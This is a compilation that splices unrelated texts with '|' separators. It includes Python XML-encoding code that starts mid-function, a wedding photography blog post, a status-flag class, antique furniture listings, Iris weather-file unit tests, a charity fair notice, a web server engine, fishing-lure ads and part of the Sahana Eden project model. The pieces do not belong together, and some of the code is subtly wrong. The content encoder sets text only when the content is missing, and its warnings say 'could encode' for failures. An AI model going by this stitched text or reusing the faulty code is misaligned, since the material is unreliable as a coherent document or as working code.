# etree.SubElement(entry, ns_elem("owc", "offering"), name="blah").text = "some value1"
if is_empty(d):
return None
else:
try:
operation = etree.Element(ns_elem("owc", "operation"), nsmap=ns)
operations_code = extract_p('code', d, None)
if operations_code is not None:
operation.set("code", operations_code)
http_method = extract_p('method', d, None)
if http_method is not None:
operation.set("method", http_method)
mimetype = extract_p('type', d, None)
if mimetype is not None:
operation.set("type", mimetype)
request_url = extract_p('href', d, None)
if request_url is not None:
operation.set("href", request_url)
# use axml_content here
request = extract_p('request', d, None)
request_enc = None if request is None else axml_content(request)
if request_enc is not None:
operation.append(request_enc)
# use axml_content here
result = extract_p('result', d, None)
result_enc = None if result is None else axml_content(result)
if result_enc is not None:
operation.append(result_enc)
return operation
except Exception as ex:
log.warn('could encode operation', ex)
return None
def axml_styleset(d):
# <owc:styleSet>
# <owc:name>raster</owc:name>
# <owc:title>Default Raster</owc:title>
# <owc:abstract>A sample style that draws a </owc:abstract>
# <owc:legendURL href="h...." type="image/png"/>
# </owc:styleSet>
if is_empty(d):
return None
else:
try:
styleset = etree.Element(ns_elem("owc", "styleSet"), nsmap=ns)
name = extract_p('name', d, None)
if name is not None:
etree.SubElement(styleset, ns_elem("owc", "name")).text = name
title = extract_p('title', d, None)
if title is not None:
etree.SubElement(styleset, ns_elem("owc", "title")).text = title
subtitle = extract_p('abstract', d, None)
if subtitle is not None:
etree.SubElement(styleset, ns_elem("owc", "abstract")).text = subtitle
is_default = extract_p('default', d, None)
# TODO no example for default setting on style set
if is_default is not None:
etree.SubElement(styleset, ns_elem("owc", "default")).text = is_default
legend_url = extract_p('legendURL', d, None)
if legend_url is not None:
etree.SubElement(styleset, ns_elem("owc", "legendURL")).text = legend_url
# TODO no example for content on style set
content = extract_p('content', d, None)
content_enc = None if content is None else axml_content(content)
if content_enc is not None:
styleset.append(content_enc)
return styleset
except Exception as ex:
log.warn('could encode styleset', ex)
return None
def axml_content(d):
"""
OwcContent dict to Atom XML
:param d:
:return:
"""
# <owc:content type="image/tiff" href=".."
if is_empty(d):
return None
else:
try:
content_elem = etree.Element(ns_elem("owc", "content"), nsmap=ns)
mimetype = extract_p('type', d, None)
if mimetype is not None:
content_elem.set("type", mimetype)
url = extract_p('url', d, None)
if url is not None:
content_elem.set("href", url)
title = extract_p('title', d, None)
if title is not None:
content_elem.set("title", title)
content = extract_p('content', d, None)
if content is None:
content_elem.text = content
return content_elem
except Exception as ex:
log.warn('could encode content', ex)
return None
|
As a wedding photographer, one of my goals is to get to know my couples before the wedding day, so I know how to best serve them and capture their moments on their wedding day for them. Sometimes that means photographing an engagement session, or having Skype calls, or simply texting. No matter what, though, it's important to me as a photographer to understand my couple before the wedding, and since Cord + Haley live in Alabama, we had the chance to chat on the phone, but I hadn't met them personally before the wedding day. But, when I arrived that morning and met them for the first time, it was as though we were already friends, and their trust was amazing. Their friends and family were absolutely incredible, and having met Haley's mother at a tasting at Top of the Market a few weeks before, it was a blast getting to meet more of their loved ones and see why they were so important to the two of them. First up, getting ready was underway, which looked slightly different between the bride and the groom!
One of the most fun parts of the day as a wedding photographer is the getting ready process; it's when we meet the wedding party, and when many fun events happen that really tell the wedding day story. For Cord, it was starting with a fun game of pickup football in a field near the hotel with his groomsmen, ushers, and friends. Cord is a quarterback at Auburn University, and many of his friends are exceptional athletes, so it was actually quite fun to capture their game. And, thanks to having an incredible second photographer with me for their wedding day (Chad Winstead of Winstead Photo), while they played football, I headed to hang with Haley and her crew back at the hotel, who were just as fun! Photographing Haley and her bridesmaids was great; they were easy going, hilarious, and Whitley, one of her flower girls, was an absolute hoot. I mean, really, when you meet someone who allows you to hop up on their bed, straddle them, and start taking photos of them lounging around after only 20 minutes of interaction, you know it’s going to be a fantastic day! Laughter abounded, and everyone was truly a joy to get to know. And, when it was time to head to Top of the Market for the wedding, it was only a five minute drive away. Perfect!
One of the cool things about Top of the Market as a wedding venue is that it boasts two spaces for weddings: the loft upstairs, and the warehouse downstairs. I've photographed plenty of weddings in both, but never have I had a wedding where both were used for a single wedding! It was incredible, and a really wonderful way to keep the pace going throughout the evening. When we arrived, we headed upstairs for the ceremony, where it had been beautifully adorned with florals from Haley's Aunt Lori. The warmth and welcoming feel was tangible, and it was elegant from start to finish. But, before the ceremony began, Cord + Haley exchanged letters...and proceeded to have us all in tears from how they both seek to love the other so unconditionally. Tears flowed as they prayed together -- but from around corners, so as to not see one another before the ceremony -- then parted ways until it was time to come down the aisle.
And talk about an amazing ceremony! Haley's brother officiated, and I'm not sure there was a dry eye in the house as all eyes turned to Haley coming down the aisle to Cord, who was amazed by his stunning bride. It was a beautiful ceremony, and celebration rang out as they were announced Mr. & Mrs.!
But, as with all amazing weddings at Top of the Market, I would be remiss to not touch on what transpired after the ceremony, which was one of the most epic dance parties I have ever seen! Cord + Haley started the party off right, with Haley using her bouquet to throw a touchdown pass to Cord on the Dance floor during their entrance, and from there, it all was hilarious, no-holds-barred shenaniganry for the remainder of the night. Imaginary jump rope dance offs ensued, photo booth props found their way to the dance floor, shirts were lost in the course of the night, and even late night pizza deliveries occurred. And, from start to finish, these two, along with their loved ones, celebrated the start of their newest adventure together in the best fashion possible: together!
And, I must give a huge, huge thank you to Chad for coming from North Carolina to photograph this wedding with me. He is one of my dear friends, and after having celebrated his own wedding with another one of my friends, Beth, (and his better half...don't worry, he knows it!) it was a treat to get to work alongside him on a wedding. This guy is incredible, and I want to thank him for his tireless work and creative eye from start to finish on this one. Let's do it again soon!
|
import logging
logger = logging.getLogger(__name__)
class StatusMessage:
NO_MESSAGE = 0x0
SUCCEEDED = 0x1 << 0
SUBMIT_DISABLED = 0x1 << 1
FAILED = 0x1 << 2
INVALID_EXE = 0x1 << 3
message_list = [
NO_MESSAGE,
SUCCEEDED,
SUBMIT_DISABLED,
FAILED,
INVALID_EXE,
]
message_text = {
NO_MESSAGE:'no message',
SUCCEEDED:'succeeded',
SUBMIT_DISABLED:'submission disabled',
FAILED:'failed',
INVALID_EXE:'invalid executable',
}
def __init__(self):
self.message = StatusMessage.NO_MESSAGE
def __str__(self):
out = []
for message in StatusMessage.message_list:
if message & self.message:
out.append(StatusMessage.message_text[message])
return str(out)
def contains(self,flag):
if flag in StatusMessage.message_list:
if self.message & flag:
return True
else:
logger.warning('Invalid Flag passed')
return False
|
Antique Swedish Baroque period secretary; 18th century painted in light blue with white interior.
Secretary is in two sections. The upper section has three shelves behind panel doors. The lower section has a slanted front with additional small drawers and secret compartments. Two small drawers and three large drawers are below. Secretary has original locks and hinges.
Secretary is in very good condition for it’s age. the distressed paint has been refreshed, there are normal age cracks in the wood finish.
Antique Swedish Gustavian style cabinet painted distressed Swedish white color. Lovely carved crown molding. One raised panel original glass door with lock and key.
Very nice sized Swedish antique drop-leaf table in original paint and a wonderful patina.
Large pair of antique Swedish Gustavian style painted chests diamond carving, late 19th century. Three-drawer chests with faux finish gray marble tops.
Pair antique Swedish Gustavian style Painted X-base stools. early 19th century. Painted in a Swedish grey distressed finish, lovely acanthus leaf border below upholstery.
© 2017-2018 Scandinavian Antiques & Living Website Design by: MvP Tech Inc.
|
# (C) British Crown Copyright 2010 - 2013, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
Test the Fieldsfile file loading plugin and FFHeader.
"""
# import iris tests first so that some things can be initialised before
# importing anything else
import iris.tests as tests
import collections
import warnings
import mock
import numpy as np
import iris
import iris.fileformats.ff as ff
import iris.fileformats.pp as pp
_MockField = collections.namedtuple('_MockField',
'lbext,lblrec,lbnrec,lbpack,lbuser')
_MockLbpack = collections.namedtuple('_MockLbpack', 'n1')
# PP-field: LBPACK N1 values.
_UNPACKED = 0
_WGDOS = 1
_CRAY = 2
_GRIB = 3 # Not implemented.
_RLE = 4 # Not supported, deprecated FF format.
# PP-field: LBUSER(1) values.
_REAL = 1
_INTEGER = 2
_LOGICAL = 3 # Not implemented.
class TestFF_HEADER(tests.IrisTest):
def test_initialisation(self):
self.assertEqual(ff.FF_HEADER[0], ('data_set_format_version', (0,)))
self.assertEqual(ff.FF_HEADER[17], ('integer_constants', (99, 100)))
def test_size(self):
self.assertEqual(len(ff.FF_HEADER), 31)
@iris.tests.skip_data
class TestFFHeader(tests.IrisTest):
def setUp(self):
self.filename = tests.get_data_path(('FF', 'n48_multi_field'))
self.ff_header = ff.FFHeader(self.filename)
self.valid_headers = (
'integer_constants', 'real_constants', 'level_dependent_constants',
'lookup_table', 'data'
)
self.invalid_headers = (
'row_dependent_constants', 'column_dependent_constants',
'fields_of_constants', 'extra_constants', 'temp_historyfile',
'compressed_field_index1', 'compressed_field_index2',
'compressed_field_index3'
)
def test_constructor(self):
"""Test FieldsFile header attribute lookup."""
self.assertEqual(self.ff_header.data_set_format_version, 20)
self.assertEqual(self.ff_header.sub_model, 1)
self.assertEqual(self.ff_header.vert_coord_type, 5)
self.assertEqual(self.ff_header.horiz_grid_type, 0)
self.assertEqual(self.ff_header.dataset_type, 3)
self.assertEqual(self.ff_header.run_identifier, 0)
self.assertEqual(self.ff_header.experiment_number, -32768)
self.assertEqual(self.ff_header.calendar, 1)
self.assertEqual(self.ff_header.grid_staggering, 3)
self.assertEqual(self.ff_header.time_type, -32768)
self.assertEqual(self.ff_header.projection_number, -32768)
self.assertEqual(self.ff_header.model_version, 802)
self.assertEqual(self.ff_header.obs_file_type, -32768)
self.assertEqual(self.ff_header.last_fieldop_type, -32768)
self.assertEqual(self.ff_header.first_validity_time,
(2011, 7, 10, 18, 0, 0, 191))
self.assertEqual(self.ff_header.last_validity_time,
(2011, 7, 10, 21, 0, 0, 191))
self.assertEqual(self.ff_header.misc_validity_time,
(2012, 4, 30, 18, 12, 13, -32768))
self.assertEqual(self.ff_header.integer_constants.shape, (46, ))
self.assertEqual(self.ff_header.real_constants.shape, (38, ))
self.assertEqual(self.ff_header.level_dependent_constants.shape,
(71, 8))
self.assertIsNone(self.ff_header.row_dependent_constants)
self.assertIsNone(self.ff_header.column_dependent_constants)
self.assertIsNone(self.ff_header.fields_of_constants)
self.assertIsNone(self.ff_header.extra_constants)
self.assertIsNone(self.ff_header.temp_historyfile)
self.assertIsNone(self.ff_header.compressed_field_index1)
self.assertIsNone(self.ff_header.compressed_field_index2)
self.assertIsNone(self.ff_header.compressed_field_index3)
self.assertEqual(self.ff_header.lookup_table, (909, 64, 5))
self.assertEqual(self.ff_header.total_prognostic_fields, 3119)
self.assertEqual(self.ff_header.data, (2049, 2961, -32768))
def test_str(self):
self.assertString(str(self.ff_header), ('FF', 'ffheader.txt'))
def test_repr(self):
target = "FFHeader('" + self.filename + "')"
self.assertEqual(repr(self.ff_header), target)
def test_shape(self):
self.assertEqual(self.ff_header.shape('data'), (2961, -32768))
@iris.tests.skip_data
class TestFF2PP2Cube(tests.IrisTest):
def setUp(self):
self.filename = tests.get_data_path(('FF', 'n48_multi_field'))
def test_unit_pass_0(self):
"""Test FieldsFile to PPFields cube load."""
cube_by_name = collections.defaultdict(int)
cubes = iris.load(self.filename)
while cubes:
cube = cubes.pop(0)
standard_name = cube.standard_name
cube_by_name[standard_name] += 1
filename = '{}_{}.cml'.format(standard_name,
cube_by_name[standard_name])
self.assertCML(cube, ('FF', filename))
@iris.tests.skip_data
class TestFFieee32(tests.IrisTest):
def test_iris_loading(self):
ff32_fname = tests.get_data_path(('FF', 'n48_multi_field.ieee32'))
ff64_fname = tests.get_data_path(('FF', 'n48_multi_field'))
ff32_cubes = iris.load(ff32_fname)
ff64_cubes = iris.load(ff64_fname)
for ff32, ff64 in zip(ff32_cubes, ff64_cubes):
# load the data
_, _ = ff32.data, ff64.data
self.assertEqual(ff32, ff64)
@iris.tests.skip_data
class TestFFVariableResolutionGrid(tests.IrisTest):
def setUp(self):
self.filename = tests.get_data_path(('FF', 'n48_multi_field'))
self.ff2pp = ff.FF2PP(self.filename)
self.ff_header = self.ff2pp._ff_header
data_shape = (73, 96)
delta = np.sin(np.linspace(0, np.pi * 5, data_shape[1])) * 5
lons = np.linspace(0, 180, data_shape[1]) + delta
lons = np.vstack([lons[:-1], lons[:-1] + 0.5 * np.diff(lons)]).T
lons = np.reshape(lons, lons.shape, order='F')
delta = np.sin(np.linspace(0, np.pi * 5, data_shape[0])) * 5
lats = np.linspace(-90, 90, data_shape[0]) + delta
lats = np.vstack([lats[:-1], lats[:-1] + 0.5 * np.diff(lats)]).T
lats = np.reshape(lats, lats.shape, order='F')
self.ff_header.column_dependent_constants = lons
self.ff_header.row_dependent_constants = lats
self.U_grid_x = lons[:, 1]
self.V_grid_y = lats[:-1, 1]
self.P_grid_x = lons[:, 0]
self.P_grid_y = lats[:, 0]
self.orig_make_pp_field = pp.make_pp_field
def new_make_pp_field(header_values):
field = self.orig_make_pp_field(header_values)
field.stash = self.ff2pp._custom_stash
field.bdx = field.bdy = field.bmdi
return field
# Replace the pp module function with this new function;
# this gets called in PP2FF.
pp.make_pp_field = new_make_pp_field
def tearDown(self):
pp.make_pp_field = self.orig_make_pp_field
def _check_stash(self, stash, x_coord, y_coord):
self.ff2pp._custom_stash = stash
field = next(iter(self.ff2pp))
self.assertArrayEqual(x_coord, field.x, ('x_coord was incorrect for '
'stash {}'.format(stash)))
self.assertArrayEqual(y_coord, field.y, ('y_coord was incorrect for '
'stash {}'.format(stash)))
def test_p(self):
self._check_stash('m01s00i001', self.P_grid_x, self.P_grid_y)
def test_u(self):
self._check_stash('m01s00i002', self.U_grid_x, self.P_grid_y)
def test_v(self):
self._check_stash('m01s00i003', self.P_grid_x, self.V_grid_y)
def test_unhandled_grid_type(self):
with mock.patch('warnings.warn') as warn_fn:
self._check_stash('m01s00i005', self.P_grid_x, self.P_grid_y)
self.assertIn("Assuming the data is on a P grid.",
warn_fn.call_args[0][0])
class TestFFPayload(tests.IrisTest):
def _test_payload(self, mock_field, expected_depth, expected_type):
with mock.patch('iris.fileformats.ff.FFHeader') as mock_header:
mock_header.return_value = None
ff2pp = ff.FF2PP('Not real')
data_depth, data_type = ff2pp._payload(mock_field)
self.assertEqual(data_depth, expected_depth)
self.assertEqual(data_type, expected_type)
def test_payload_unpacked_real(self):
mock_field = _MockField(lbext=0, lblrec=100, lbnrec=-1,
lbpack=_MockLbpack(_UNPACKED),
lbuser=[_REAL])
expected_type = ff._LBUSER_DTYPE_LOOKUP[_REAL].format(word_depth=8)
expected_type = np.dtype(expected_type)
self._test_payload(mock_field, 800, expected_type)
def test_payload_unpacked_real_ext(self):
mock_field = _MockField(lbext=50, lblrec=100, lbnrec=-1,
lbpack=_MockLbpack(_UNPACKED),
lbuser=[_REAL])
expected_type = ff._LBUSER_DTYPE_LOOKUP[_REAL].format(word_depth=8)
expected_type = np.dtype(expected_type)
self._test_payload(mock_field, 400, expected_type)
def test_payload_unpacked_integer(self):
mock_field = _MockField(lbext=0, lblrec=200, lbnrec=-1,
lbpack=_MockLbpack(_UNPACKED),
lbuser=[_INTEGER])
expected_type = ff._LBUSER_DTYPE_LOOKUP[_INTEGER].format(word_depth=8)
expected_type = np.dtype(expected_type)
self._test_payload(mock_field, 1600, expected_type)
def test_payload_unpacked_integer_ext(self):
mock_field = _MockField(lbext=100, lblrec=200, lbnrec=-1,
lbpack=_MockLbpack(_UNPACKED),
lbuser=[_INTEGER])
expected_type = ff._LBUSER_DTYPE_LOOKUP[_INTEGER].format(word_depth=8)
expected_type = np.dtype(expected_type)
self._test_payload(mock_field, 800, expected_type)
def test_payload_wgdos_real(self):
mock_field = _MockField(lbext=0, lblrec=-1, lbnrec=100,
lbpack=_MockLbpack(_WGDOS),
lbuser=[_REAL])
self._test_payload(mock_field, 796, pp.LBUSER_DTYPE_LOOKUP[_REAL])
def test_payload_wgdos_real_ext(self):
mock_field = _MockField(lbext=50, lblrec=-1, lbnrec=100,
lbpack=_MockLbpack(_WGDOS),
lbuser=[_REAL])
self._test_payload(mock_field, 796, pp.LBUSER_DTYPE_LOOKUP[_REAL])
def test_payload_wgdos_integer(self):
mock_field = _MockField(lbext=0, lblrec=-1, lbnrec=200,
lbpack=_MockLbpack(_WGDOS),
lbuser=[_INTEGER])
self._test_payload(mock_field, 1596, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
def test_payload_wgdos_integer_ext(self):
mock_field = _MockField(lbext=100, lblrec=-1, lbnrec=200,
lbpack=_MockLbpack(_WGDOS),
lbuser=[_INTEGER])
self._test_payload(mock_field, 1596, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
def test_payload_cray_real(self):
mock_field = _MockField(lbext=0, lblrec=100, lbnrec=-1,
lbpack=_MockLbpack(_CRAY),
lbuser=[_REAL])
self._test_payload(mock_field, 400, pp.LBUSER_DTYPE_LOOKUP[_REAL])
def test_payload_cray_real_ext(self):
mock_field = _MockField(lbext=50, lblrec=100, lbnrec=-1,
lbpack=_MockLbpack(_CRAY),
lbuser=[_REAL])
self._test_payload(mock_field, 200, pp.LBUSER_DTYPE_LOOKUP[_REAL])
def test_payload_cray_integer(self):
mock_field = _MockField(lbext=0, lblrec=200, lbnrec=-1,
lbpack=_MockLbpack(_CRAY),
lbuser=[_INTEGER])
self._test_payload(mock_field, 800, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
def test_payload_cray_integer_ext(self):
mock_field = _MockField(lbext=100, lblrec=200, lbnrec=-1,
lbpack=_MockLbpack(_CRAY),
lbuser=[_INTEGER])
self._test_payload(mock_field, 400, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
if __name__ == '__main__':
tests.main()
|
The Outer Banks Woman’s Club is one of those organizations that seem to fall into the background, don’t get a lot of publicity but keep doing good works over and over again.
These are the folks that that always seem to be ones who find ways to give to local causes like the Outer Banks Relief Foundation, the Beach Food Pantry and Food for Thought or the V.I.P Fishing Tournament that was just held.
Now that it’s the holiday season they’re really taking it up a notch with their Annual Angel Gift Program that reaches out to local children who may not have gifts otherwise.
It’s really grassroots funding which is what their Arts and Craft Christmas Fair is all about. It’s coming up Friday and Saturday, November 28 and 29 over Thanksgiving Weekend at the Baum Center in Kill Devil Hills.
Admission is only $1.00, proceeds go to making sure as many children as possible have something from that “fat jolly old elf”-that’s a quote from A Visit from St. Nicholas for those who have forgotten about the night before Christmas. The funds also go into a scholarship fund.
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import logging
import gevent
import bottle
from gevent import pywsgi
from ava.runtime import config
from ava.runtime import environ
logger = logging.getLogger(__name__)
_CONF_SECTION = 'webfront'
class ApplicationDispatcher(object):
"""Allows one to mount middlewares or applications in a WSGI application.
"""
def __init__(self, app, mounts=None):
self.app = app
self.mounts = mounts or {}
def __call__(self, environ, start_response):
script = environ.get(b'PATH_INFO', b'')
path_info = ''
while b'/' in script:
if script in self.mounts:
app = self.mounts[script]
break
script, last_item = script.rsplit(b'/', 1)
path_info = b'/%s%s' % (last_item, path_info)
else:
app = self.mounts.get(script, self.app)
original_script_name = environ.get(b'SCRIPT_NAME', b'')
environ[b'SCRIPT_NAME'] = original_script_name + script
environ[b'PATH_INFO'] = path_info
return app(environ, start_response)
def attach_app(self, path, app):
self.mounts[path] = app
def detach_app(self, path):
app = self.mounts.get(path)
if app is not None:
del self.mounts[path]
# the global web application
dispatcher = ApplicationDispatcher(bottle.app())
class WebfrontEngine(object):
"""
The client-facing web interface.
"""
def __init__(self):
logger.debug("Initializing webfront engine...")
self._http_listener = None
self._https_listener = None
self.listen_port = 5000
self.listen_addr = '127.0.0.1'
self.secure_listen_port = 0 # o means not binding
self.local_base_url = "http://127.0.0.1:%d/" % (self.listen_port,)
def start(self, ctx=None):
logger.debug("Starting webfront engine...")
self.listen_port = config.agent().getint(_CONF_SECTION, 'listen_port')
self.listen_addr = config.agent().get(_CONF_SECTION, 'listen_addr')
self.secure_listen_port = config.agent().getint(_CONF_SECTION, 'secure_listen_port')
self.local_base_url = "http://127.0.0.1:%d/" % (self.listen_port,)
logger.debug("Local base URL:%s", self.local_base_url)
if self.listen_port != 0:
ctx.add_child_greenlet(gevent.spawn(self._run_http))
if self.secure_listen_port != 0:
ctx.add_child_greenlet(gevent.spawn(self._run_https))
logger.debug("Webfront engine started.")
def stop(self, ctx=None):
logger.debug("Webfront engine stopped.")
def _run_https(self):
logger.debug("Webfront engine(HTTPS) is running...")
conf_dir = environ.conf_dir()
keyfile = os.path.join(conf_dir, 'ava.key')
certfile = os.path.join(conf_dir, 'ava.crt')
self._https_listener = pywsgi.WSGIServer((self.listen_addr, self.secure_listen_port),
dispatcher,
keyfile=keyfile,
certfile=certfile)
logger.debug("Webfront engine(HTTPS) is listening on port: %d", self._https_listener.address[1])
self._https_listener.serve_forever()
def _run_http(self):
logger.debug("Webfront engine(HTTP) is running...")
self._http_listener = pywsgi.WSGIServer((self.listen_addr, self.listen_port),
dispatcher)
logger.debug("Webfront engine(HTTP) is listening on port: %d", self._http_listener.address[1])
self._http_listener.serve_forever()
|
T-HEX METAL LURES From Cape Cod to Cape Hatteras, these metals are a proven winner. For Stripers, Bluefish, Weakfish, Spanish Mackeral, Bonito, False Albies and Fluke. For casting, jigging, trolling; Beach, boat and jetty. Multi faceted body to catch and reflect more light. Great action throughout the water column. Imitates many of the baitfish found along the East Coast. Such as: Sandeels, Spearing-Rainfish, Finger Mullet, Peanut Bunker, etc. Will Out-cast and Out-catch every other tin in your bag! Precision Machined from Solid Brass, plated with a Bright, Durable Nickel/Chro..
A.O.K. T-HEX with TubeTail Hooks and Spro Power Swivels From Cape Cod to Cape Hatteras, these metals are a proven winner. For Stripers, Bluefish, Weakfish, Spanish Mackeral, Bonito, False Albies and Fluke. For casting, jigging, trolling; Beach, boat and jetty. Multi faceted body to catch and reflect more light. Great action throughout the water column. Imitates many of the baitfish found along the East Coast. Such as: Sandeels, Spearing-Rainfish, Finger Mullet, Peanut Bunker, etc. Will Out-cast and Out-catch every other tin in your bag! Precision Machined from Solid Brass, p..
|
# *- coding: utf-8 -*-
""" Sahana Eden Project Model
@copyright: 2011-2013 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["S3ProjectModel",
"S3ProjectActivityModel",
"S3ProjectActivityTypeModel",
"S3ProjectActivityOrganisationModel",
"S3ProjectAnnualBudgetModel",
"S3ProjectBeneficiaryModel",
"S3ProjectCampaignModel",
"S3ProjectFrameworkModel",
"S3ProjectHazardModel",
"S3ProjectLocationModel",
"S3ProjectOrganisationModel",
"S3ProjectOutputModel",
"S3ProjectSectorModel",
"S3ProjectThemeModel",
"S3ProjectDRRModel",
"S3ProjectDRRPPModel",
"S3ProjectTaskModel",
"S3ProjectTaskHRMModel",
"S3ProjectTaskIReportModel",
"project_rheader",
"project_task_form_inject",
"project_task_controller",
]
import datetime
try:
import json # try stdlib (Python 2.6)
except ImportError:
try:
import simplejson as json # try external module
except:
import gluon.contrib.simplejson as json # fallback to pure-Python module
try:
# Python 2.7
from collections import OrderedDict
except:
# Python 2.6
from gluon.contrib.simplejson.ordered_dict import OrderedDict
from gluon import *
from gluon.dal import Row
from gluon.storage import Storage
from ..s3 import *
from s3layouts import S3AddResourceLink
# =============================================================================
class S3ProjectModel(S3Model):
"""
Project Model
Note: This module can be extended by 2 different modes:
- '3w': "Who's doing What Where"
suitable for use by multinational organisations tracking
projects at a high level
- sub-mode 'drr': Disaster Risk Reduction extensions
- 'task': Suitable for use by a smaller organsiation tracking tasks
within projects
There are also a number of other deployment_settings to control behaviour
This class contains the tables common to all uses
There are additional tables in other Models
"""
names = ["project_status",
"project_project",
"project_project_id",
"project_project_represent",
"project_human_resource",
"project_hfa_opts",
"project_jnap_opts",
"project_pifacc_opts",
"project_rfa_opts",
"project_theme_opts",
"project_theme_helps",
"project_hazard_opts",
"project_hazard_helps",
]
def model(self):
T = current.T
db = current.db
auth = current.auth
NONE = current.messages["NONE"]
human_resource_id = self.hrm_human_resource_id
settings = current.deployment_settings
mode_3w = settings.get_project_mode_3w()
mode_task = settings.get_project_mode_task()
mode_drr = settings.get_project_mode_drr()
use_codes = settings.get_project_codes()
use_sectors = settings.get_project_sectors()
multi_budgets = settings.get_project_multiple_budgets()
multi_orgs = settings.get_project_multiple_organisations()
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
set_method = self.set_method
# ---------------------------------------------------------------------
# Project Statuses
#
tablename = "project_status"
table = define_table(tablename,
Field("name", length=128,
notnull=True, unique=True,
label=T("Name")),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_STATUS = T("Add Status")
crud_strings[tablename] = Storage(
title_create = ADD_STATUS,
title_display = T("Status Details"),
title_list = T("Statuses"),
title_update = T("Edit Status"),
#title_upload = T("Import Statuses"),
subtitle_create = T("Add New Status"),
label_list_button = T("List Statuses"),
label_create_button = ADD_STATUS,
label_delete_button = T("Delete Status"),
msg_record_created = T("Status added"),
msg_record_modified = T("Status updated"),
msg_record_deleted = T("Status deleted"),
msg_list_empty = T("No Statuses currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename, translate=True)
#none = T("Unknown"))
status_id = S3ReusableField("status_id", table,
label = T("Status"),
sortby = "name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_status.id",
represent,
sort=True)),
represent = represent,
comment = S3AddResourceLink(title=ADD_STATUS,
c="project",
f="status"),
ondelete = "SET NULL")
# ---------------------------------------------------------------------
# Projects
#
LEAD_ROLE = settings.get_project_organisation_lead_role()
org_label = settings.get_project_organisation_roles()[LEAD_ROLE]
tablename = "project_project"
table = define_table(tablename,
self.super_link("doc_id", "doc_entity"),
# multi_orgs deployments use the separate project_organisation table
# - although Lead Org is still cached here to avoid the need for a virtual field to lookup
self.org_organisation_id(
label = org_label,
default = auth.root_org(),
requires = self.org_organisation_requires(
required = True,
# Only allowed to add Projects for Orgs that the user has write access to
updateable = True,
),
),
Field("name", unique=True, length=255,
label = T("Project Name"),
# Require unique=True if using IS_NOT_ONE_OF like here (same table,
# no filter) in order to allow both automatic indexing (faster)
# and key-based de-duplication (i.e. before field validation)
requires = [IS_NOT_EMPTY(error_message=T("Please fill this!")),
IS_NOT_ONE_OF(db, "project_project.name")]
),
Field("code",
label = T("Short Title / ID"),
readable = use_codes,
writable = use_codes,
),
Field("description", "text",
label = T("Description")),
status_id(),
# NB There is additional client-side validation for start/end date in the Controller
s3_date("start_date",
label = T("Start Date")
),
s3_date("end_date",
label = T("End Date")
),
# Free-text field with no validation (used by OCHA template currently)
Field("duration",
label = T("Duration"),
readable=False,
writable=False,
),
Field("calendar",
label = T("Calendar"),
readable = mode_task,
writable = mode_task,
requires = IS_NULL_OR(IS_URL()),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Calendar"),
T("URL to a Google Calendar to display on the project timeline.")))),
# multi_budgets deployments handle on the Budgets Tab
Field("budget", "double",
readable = False if multi_budgets else True,
writable = False if multi_budgets else True,
label = T("Budget"),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2)),
s3_currency(readable = False if multi_budgets else True,
writable = False if multi_budgets else True,
),
Field("objectives", "text",
readable = mode_3w,
writable = mode_3w,
represent = lambda v: v or NONE,
label = T("Objectives")),
human_resource_id(label=T("Contact Person")),
s3_comments(comment=DIV(_class="tooltip",
_title="%s|%s" % (T("Comments"),
T("Outcomes, Impact, Challenges")))),
*s3_meta_fields())
# CRUD Strings
ADD_PROJECT = T("Add Project")
crud_strings[tablename] = Storage(
title_create = ADD_PROJECT,
title_display = T("Project Details"),
title_list = T("Projects"),
title_update = T("Edit Project"),
title_search = T("Search Projects"),
title_report = T("Project Report"),
title_upload = T("Import Projects"),
subtitle_create = T("Add New Project"),
label_list_button = T("List Projects"),
label_create_button = ADD_PROJECT,
label_delete_button = T("Delete Project"),
msg_record_created = T("Project added"),
msg_record_modified = T("Project updated"),
msg_record_deleted = T("Project deleted"),
msg_list_empty = T("No Projects currently registered"))
# Search Method
status_search_widget = S3SearchOptionsWidget(
name = "project_search_status",
label = T("Status"),
field = "status_id",
cols = 4,
)
simple = [
S3SearchSimpleWidget(name = "project_search_text_advanced",
label = T("Description"),
comment = T("Search for a Project by name, code, or description."),
field = ["name",
"code",
"description",
]
),
status_search_widget,
]
advanced = list(simple)
append = advanced.append
append(S3SearchOptionsWidget(
name = "project_search_organisation_id",
label = org_label,
field = "organisation_id",
cols = 3
))
append(S3SearchOptionsWidget(
name = "project_search_L0",
field = "location.location_id$L0",
location_level="L0",
cols = 3
))
